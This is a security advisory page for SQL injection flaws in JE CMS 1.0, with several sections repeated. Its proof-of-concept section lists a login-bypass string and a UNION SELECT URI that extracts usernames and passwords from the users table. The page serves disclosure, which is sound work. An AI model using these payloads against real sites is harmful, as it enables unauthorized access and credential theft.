JE CMS Multiple SQL Injection Vulnerabilities
BID:43541
Info
JE CMS Multiple SQL Injection Vulnerabilities
| Bugtraq ID: | 43541 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Sep 28 2010 12:00AM |
| Updated: | Sep 28 2010 12:00AM |
| Credit: | Abysssec |
| Vulnerable: |
Joenas Ejes JE CMS 1.0 |
| Not Vulnerable: | |
Discussion
JE CMS Multiple SQL Injection Vulnerabilities
JE CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
JE CMS 1.0.0 and prior are vulnerable.
JE CMS is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
JE CMS 1.0.0 and prior are vulnerable.
Exploit / POC
JE CMS Multiple SQL Injection Vulnerabilities
Attackers can use a browser to exploit these issues.
The following example data is available:
username: admin' or '1=1
password: admin' or '1=1
The following example URI is available:
http://www.example.com/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--
Attackers can use a browser to exploit these issues.
The following example data is available:
username: admin' or '1=1
password: admin' or '1=1
The following example URI is available:
http://www.example.com/joenas-ejes/administrator/index.php?jepage=edituser&userid=1 and 1=2 UNION SELECT 1,2,3,4,group_concat(username,0x3a,password),6,7,8,9,10,11,12 from users--
Solution / Fix
JE CMS Multiple SQL Injection Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
JE CMS Multiple SQL Injection Vulnerabilities
References:
References:
- JE CMS Homepage (Joenas Ejes)
- MOAUB #28 �?? JE CMS 1.0.0 Bypass Authentication by SQL Injection Vulnerability (Abysssec Research)